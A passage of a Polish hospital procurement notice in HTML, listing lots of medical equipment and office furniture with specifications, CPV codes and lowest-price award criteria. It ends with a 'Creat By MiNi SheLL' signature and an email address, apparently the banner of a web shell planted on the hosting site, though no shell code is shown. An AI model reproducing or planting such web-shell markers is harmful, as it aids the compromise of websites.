7.	Ramiona rozpierane śrubowym mechanizmem naciągu grotu poprzez pokręcanie pokrętłem
8.	Wykonanie ze stali nierdzewnej
9.	Możliwość zawieszenia klamry na haku - otwory do zawieszania klamry  na haku
10.	Możliwość zastosowania drutów (grotów) o średnicach 1-2,4mm
11.	Certyfikat wyrobu medycznego  Typ Kirschner - kształt litery U
12.	Szerokość wewnętrzna klamry przy równoległym ustawieniu jej ramion 82mm
13.	Maksymalne rozwarcie - 160mm
14.	Wolna przestrzeń pomiędzy drutem Kirschnera a pokrętłem klamry 12cm
15.	Dwa połączone osiowo ramiona
16.	Na końcach ramion śruby zaciskowe
17.	Ramiona rozpierane śrubowym mechanizmem naciągu grotu poprzez pokręcanie pokrętłem
18.	Wykonanie ze stali nierdzewnej
19.	Możliwość zawieszenia klamry na haku - otwory do zawieszania klamry  na haku
20.	Możliwość zastosowania drutów (grotów) o średnicach 1-2,4mm
21.	Certyfikat wyrobu medycznego  zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010r. oraz innymi obowiązującymi przepisami prawa w tym zakresie. 
22.	Oznakowanie znakiem CE - nr Certyfikatu CE/Deklaracje zgodności
 Rok produkcji: 2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8 Stoliki przyłóżkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stoliki przyłóżkowe - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9 PIONIZATOR TYPU DOLOMITE STEP UP LUB RÓWNOWAŻNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PIONIZATOR TYPU DOLOMITE STEP UP LUB RÓWNOWAŻNY
1. Wersja manualna - 1 szt.
2. Wersja hydrauliczna z hamulcem - 1 szt.
3. Podpórka pod łokcie - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10 Wózek do przewożenia zwłok z przykryciem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek do przewożenia zwłok z przykryciem - - 1 szt.
Konstrukcja metalowa wykonana z profili stalowych pokryta lakierem proszkowym
2.	Regulacja wysokości leża za pomocą mechanizmu śrubowego
3.	Zdejmowane leże, które może służyć jako nosze
4.	Cztery krążki odbojowe
5.	Podstawa jezdna wyposażona w cztery antystatyczne kółka jezdne, w tym dwa 
z blokadą
6.	Wymiary zewnętrzne: długość 1970  x  szerokość 695 mm  
7.	Zakres regulacji wysokości leża:  610 - 840 mm  
8.	Wymiary przykrycia:  długość 1865 x szerokość u dołu 685 x szerokość u góry 330 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.94.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11 Wózek zabiegowo-opatrunkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek zabiegowo-opatrunkowy - 1 szt.
1. Lekki wózek zabiegowo - opatrunkowy  do postawienia aparatu Niccomo
2.  Z boczną półką 
3. Wózek z min. 3 szufladami  (2 płytkie, 1 głęboka)
4. Wymiary 750 x 550 x 1085 mm
5. Rok produkcji: 2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12 Wózek do czystej i brudnej bielizny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wózek do czystej i brudnej bielizny - 1 szt.
- wykonana ze stali nierdzewnej, kwasoodpornej
- szafka z dwoma półkami z pojedynczymi drzwiczkami
- blat z relingami zabezpieczającymi o wymiarach: 600 x 600 mm
- z tyłu szafki uchwyt na worek foliowy o pojemności 120 l. z pokrywą podnoszoną ręcznie
- wózek na czterech kółkach o średnicy 125 mm, dwa koła z blokadą
- przy kołach odbojniki z tworzywa sztucznego
- wymiary zewnętrzne: 670 x 1170 x 1100 mm
- rok produkcji: 2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13 Szafa endoskopowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szafa endoskopowa - 2 szt.
- Wykonana w całości ze stali kwasoodpornej OH18N9
- Dwudrzwiowa
- Oszklona 
- Wyposażona w 5 wysuwanych wieszaków na endoskopy oraz tacę ociekową oraz wydłużona prowadnica do kosz na głowicę
- Szafa wykonana w systemie podwójnej ścianki z elementami izolacyjno-wygłuszającymi
- Wnętrze szafy szczelne, bez zagłębień, zagięć oraz szczelin umożliwiających gromadzenie się brudu
- Drzwi wykonane z dwóch paneli tworzących kasetę z uszczelką przeciwpyłową wyposażoną w zamek trzypunktowy typu Baskwil
- Drzwi przeszklone szkłem bezpiecznym
- Szafa posadowiona na nóżkach o wysokości ok.140 mm z regulacją wysokości w zakresie 20 mm umożliwiających wypoziomowanie
- Wszystkie krawędzie zaokrąglone, bezpieczne
-  Rok produkcji: 2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. MEBLE BIUROWE (RTG)	
1.1 Stół 
Nogi metalowe, blat z płyty melaminowanej, brzegi zabezpieczone obrzeżem PCV 2 mm, grubość blatu  36 mm; dł. 1200 mm, szer. 800 mm, wys. 750 mm; kolor blatu wenge drobnosłoiste jasne - 1 szt.
1.2	Krzesła stelaż metalowy 
Tapicerowane siedzisko i oparcie, tapicerka zmywalna - 3 szt.
1.3	Szafka wisząca z drzwiami i dwiema półkami regulowanymi; szer. 600 mm, wys. 720 mm, gł. 320 mm - 2 szt.
1.4	Szafka stojąca z pięcioma metalowymi szufladami szer. 600 mm, gł. 600 mm, wys. 850 mm z blatem, materiał wenge drobnosłoiste jasne, płyta melaminowana, pcv 2mm, grubość blatów ok. 30 mm
uchwyty metalowe ZnAl - 1 szt.
1.5	Szafki na rzeczy osobiste
z drzwiami zamykanymi zamkami, z uchwytami metalowymi; wewnątrz każdej przestrzeni jedna półka; wysokość 1700 mm (szafki 1600 mm plus nóżki metalowe 100 mm); gł. 500 mm, szer. całej zabudowy 3200 mm (jedna przestrzeń ok. 400 mm szerokości)
materiał wenge drobnosłoiste jasne płyta melaminowana, pcv 2mm na frontach, na korpusach pcv 1mm - 16 szt.
1.6	Fotel obrotowy na kółkach - 4 szt. 
Krzesło / fotel biurowy, obrotowy, tapicerka zmywalna
Dostateczna stabilność, przez wyposażenie siedziska w podstawę co najmniej pięciopodporową z kółkami jezdnymi	         	
1.   Udźwig min. 110kg		
2.   Wymiary i regulacje oparcia i siedziska zapewniające wygodną pozycję ciała i swobodę ruchów	
3.  Wyprofilowanie płyty siedziska i oparcia odpowiednie do naturalnego wygięcia    kręgosłupa i odcinka udowego kończyn dolnych		
4.   Regulacja głębokości, wysokości oraz pochylenia siedziska		
5.   Mechanizm trzydźwigniowy
6.   Możliwość blokady kąta odchylenia siedziska i oparcia w wybranej pozycji jednocześnie		
7.   Możliwość blokady kąta odchylenia samego oparcia	
8.   Siedzisko i oparcie odchylające się niezależnie od siebie		
9.   Regulacja siły oporu oparcia		
10.  Płynnie regulowana wysokość krzesła biurowego	
11.  Stabilna, nylonowa podstawa jezdna		
12.  Regulację wysokości oparcia oraz regulację pochylenia w zakresie: 5o do przodu i 30o do    tyłu		
13.  Możliwość obrotu wokół osi pionowej o 360o		
14.  Podłokietniki w kształcie litery T; regulacja wysokości podłokietników ponad płytą   siedziska w zakresie co najmniej 20 ÷ 25cm; odległość między podłokietnikami: 46 ÷ 51cm		
15.   Mechanizmy regulacji powinny być łatwo dostępne i proste w obsłudze oraz tak usytuowane, aby regulację można było wykonywać w pozycji siedzącej 
1.7	Biurko komputerowe Szer. 1200 mm (+100 mm), gł. 600 mm (+ 100 mm), wys. 750 mm (+100 mm); pod blatem na środku prowadnica na klawiaturę, w blatach przepusty kablowe;  przestrzeń  na komputer;kolorystyka mebli wenge drobnosłoiste jasne - 1 szt.
1.8	Podstawka pod monitor
Wys. 150 mm, szer. 300 mm, dł. 250 mm - 1 szt.
1.9	Szafa na dokumenty
 Szer. 800 mm, gł. 350 mm, wys. ok. 1900 mm; przestrzenie między półkami dopasować do segregatorów A4 pionowo; w przestrzeni otwartej blat roboczy wysuwany na prowadnicy kulkowej; uchwyty ZnAl; zawiasy puszkowe fi 35 mm - 2 szt.
1.10	Szafa ubraniowa 
Szer. 600 mm, wys. ok 1900mm, gł. 350mm, wewnątrz jedna półka i wieszak wysuwny na ubrania; zamek meblowy w drzwiach - 1 szt.
1.11	Wieszak ścienny
 Wieszaki (haczyki) metalowe min. 2 szt. na płycie melaminowanej wys. 1200 mm, szer. 120 mm - 2 szt.
1.12	Stolik: kwadratowy
Wymiary  600/600/600 mm z płyty melaminowanej na metalowych nogach - 1 szt.
1.13	Krzesło metalowe
Tapicerowane siedzisko i oparciem, podłokietniki; tapicerka zmywalna - 2 szt.
1.14	Szafka socjalna stojąca
Szafka z półką, dwojgiem drzwi i dwiema szufladami; blat postforming, wys. 850 mm, szer. 800 mm, gł. 500 mm - 1 szt.
1.15	Szafka wisząca
Wys. 720 mm, szer. 800 mm, gł. 320 mm, wewnątrz dwie półki regulowane, dwoje drzwiczek - 1 szt.
1.16	Ławka we wnęce
Szer. 720 mm, wys. 450 mm, gł. 350 mm; wykonana z płyty melaminowanej; obrzeże PCV 2 mm; szt.1 ; wykonawca zobowiązany jest wykonać przedmiar z natury - 1 szt.
2. POKÓJ KSIĘGOWOŚCI
2.1	Biurko
Szer. 1500 mm, gł. 650 mm, wys. 750mm. Blat biurka grubości 36 mm, w blacie biurka przepusty kablowe, pod blatem po środku biurka prowadnica na komputer - 2 szt.
2.2	Kontenerek z szufladami 
Szer. 400 mm, gł. 500, wys. 850 mm., na kółkach
- Wyposażony w 3 szuflady + na górze w tzw. piórnik, szuflady wraz z piórnikiem wyposażone w zamek kluczowy - 2 szt.
2.3	Szafka socjalna
Szer. 800 mm, gł. 600 mm, wys. 850 mm. Blat postforming. Wewnątrz dwie szuflady oraz szafka z drzwiczkami i półką - 1 szt.
2.4	 Szafa na dokumenty
Szer. 650 mm, gł. 650 mm, wys. ok. 2400 mm, szer. 800 mm. Wewnątrz półki na segregatory A4 pionowo poukładane podwójnie na głębokości. W szafach mocne zamki (np. patentowe) - 4 szt.
2.5	Szafa ubraniowa
Szer. 600 mm, wys. 1700 mm, gł. 400 mm. Wewnątrz półka i wieszak wysuwany. Powyżej do wysokości 2400 szafa na segregatory zamykana na zamek - 1 szt.
2.6	Dostawka do biurka
Blat o grubości 36 mm. Na dwóch metalowych nogach fi 60 mm, satyna - 1 szt.
2.7	Krzesło tapicerowane na stelażu metalowym  
Tapicerowane siedzisko i oparcie. - 1 szt.
2.8	Fotel obrotowy- 2 szt.
Krzesło / fotel biurowy, obrotowy, tapicerka zmywalna
Dostateczna stabilność, przez wyposażenie siedziska w podstawę co najmniej pięciopodporową z kółkami jezdnymi	         	
1.   Udźwig min. 110kg		
2.   Wymiary i regulacje oparcia i siedziska zapewniające wygodną pozycję ciała i swobodę ruchów	
3.  Wyprofilowanie płyty siedziska i oparcia odpowiednie do naturalnego wygięcia    kręgosłupa i odcinka udowego kończyn dolnych		
4.   Regulacja głębokości, wysokości oraz pochylenia siedziska		
5.   Mechanizm trzydźwigniowy
6.   Możliwość blokady kąta odchylenia siedziska i oparcia w wybranej pozycji jednocześnie		
7.   Możliwość blokady kąta odchylenia samego oparcia	
8.   Siedzisko i oparcie odchylające się niezależnie od siebie		
9.   Regulacja siły oporu oparcia		
10.  Płynnie regulowana wysokość krzesła biurowego	
11.  Stabilna, nylonowa podstawa jezdna		
12.  Regulację wysokości oparcia oraz regulację pochylenia w zakresie: 5o do przodu i 30o do    tyłu		
13.  Możliwość obrotu wokół osi pionowej o 360o		
14.  Podłokietniki w kształcie litery T; regulacja wysokości podłokietników ponad płytą   siedziska w zakresie co najmniej 20 ÷ 25cm; odległość między podłokietnikami: 46 ÷ 51cm		
15.   Mechanizmy regulacji powinny być łatwo dostępne i proste w obsłudze oraz tak usytuowane, aby regulację można było wykonywać w pozycji siedzącej 3	
REGAŁY DO MAGAZYNU
3.1	Wnękowa szafa drewniana na metalowe części: szafa z nadstawką - 1 szt.
3.2	Szafka drewniana wisząca : szer. 340mm, wys. 800mm, gł. 360 mm ,wewnątrz dwie półki, zamykana drzwiami; kolor popielaty, płyta melaminowana - 1 szt.
3.3	Uzupełnienie szafki stojącej - fronty suwane, boczek wewnętrzny oraz dwie półki - 1 kpl.
3.4	Nadstawka szafki wiszącej: szer. 970 mm, wys. 800 mm, gł. 360 mm wewnątrz jedna półka, dwoje drzwi - 1 szt.
3.5	Szafa z drzwiami suwanymi szt. 1; szer. 1060 mm, gł. 400 mm, wys. 2060 mm; wewnątrz jedna półka proponowana kolorystyka popiel - identyczny lub zbliżony do istniejących mebli - 1 szt.
4	 SZAFA NA BIELIZNĘ (POŚCIEL) - 1 szt.
Wymiary szafy:   wys. 240 cm,   szer. 133 cm,  gł.  60 cm
- Szafa wyposażona w 4 półki równomiernie rozmieszczone z możliwością regulacji
- Szafa zamykana na dwie pary drzwiczek 
- Kolor do uzgodnienia po wyborze oferenta 
5. Regał biurowy- 1 szt.
-  Wymiary: wys. 190 cm, szer. 100 cm, gł. 40 cm
-  Szafa wyposażona w 3 półki o regulowanej wysokości
-  Odległość między półkami 35 cm
-  Na dole szafki półka zamykana na klucz
-  Kolor do uzgodnienia (drewnopodobne) 
6. Szafka do gabinetu zabiegowego- 1 szt.
- Wymiary szafki:  wys. 84 cm,  szer. 68 cm,  gł. 54 cm
- Szafka z trzema szufladami o równej wielkości 
7. Szafka wisząca na naczynia- 1 szt.
Szafka wisząca: wys. 720 mm, gł. 320 mm, szer. 900 mm; wewnątrz suszarka na naczynia,
a  w drugiej części dwie półki regulowane na wysokość.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Biurko
Szer. 1200 mm (+100 mm); gł. 600 mm (+100mm) ; wys. 750 mm (+100 mm); blaty grubość 36 mm; pod blatem na środku prowadnica na klawiaturę, w blatach przepusty kablowe - 10 szt.
2. Kontenerek - 10 szt.
- Wymiary: szer. 450 mm; gł. 500 mm; wys. 600 mm (+100 mm); na kółkach, z zamkiem centralnym;
- Na kółkach
- Wyposażony w 3 szuflady + na górze w tzw. piórnik
- Szuflady wraz z piórnikiem wyposażone w zamek kluczowy
-  Kolor do uzgodnienia po wyborze oferenta 
3.	Krzesło / fotel biurowy, obrotowy, tapicerka tekstylna - 1 szt.
Dostateczna stabilność, przez wyposażenie siedziska w podstawę co najmniej pięciopodporową z kółkami jezdnymi	         	
1.   Udźwig min. 110kg		
2.   Wymiary i regulacje oparcia i siedziska zapewniające wygodną pozycję ciała i swobodę ruchów	
3.  Wyprofilowanie płyty siedziska i oparcia odpowiednie do naturalnego wygięcia    kręgosłupa i odcinka udowego kończyn dolnych		
4.   Regulacja głębokości, wysokości oraz pochylenia siedziska		
5.   Mechanizm trzydźwigniowy
6.   Możliwość blokady kąta odchylenia siedziska i oparcia w wybranej pozycji jednocześnie		
7.   Możliwość blokady kąta odchylenia samego oparcia	
8.   Siedzisko i oparcie odchylające się niezależnie od siebie		
9.   Regulacja siły oporu oparcia		
10.  Płynnie regulowana wysokość krzesła biurowego	
11.  Stabilna, nylonowa podstawa jezdna		
12.  Regulację wysokości oparcia oraz regulację pochylenia w zakresie: 5o do przodu i 30o do    tyłu		
13.  Możliwość obrotu wokół osi pionowej o 360o		
14.  Podłokietniki w kształcie litery T; regulacja wysokości podłokietników ponad płytą   siedziska w zakresie co najmniej 20 ÷ 25cm; odległość między podłokietnikami: 46 ÷ 51cm		
15.   Mechanizmy regulacji powinny być łatwo dostępne i proste w obsłudze oraz tak usytuowane, aby regulację można było wykonywać w pozycji siedzącej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com